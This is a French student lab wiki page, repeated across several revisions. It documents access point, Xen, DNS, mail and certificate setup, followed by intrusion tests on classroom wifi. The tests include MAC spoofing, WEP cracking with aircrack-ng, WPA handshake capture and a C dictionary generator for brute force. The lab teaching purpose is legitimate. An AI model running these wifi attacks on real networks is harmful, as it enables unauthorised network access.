iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23130
TP sysres IMA2a5 2015/2016 G3
2015-11-22T18:01:20Z
<p>Mstrunc : </p>
<hr />
<div>Projet Système & Réseaux IMA2A S9 <br />
<br /><br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23129
TP sysres IMA2a5 2015/2016 G3
2015-11-22T17:48:22Z
<p>Mstrunc : </p>
<hr />
<div>Projet Système & Réseaux IMA2A S9 <br />
<br /><br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
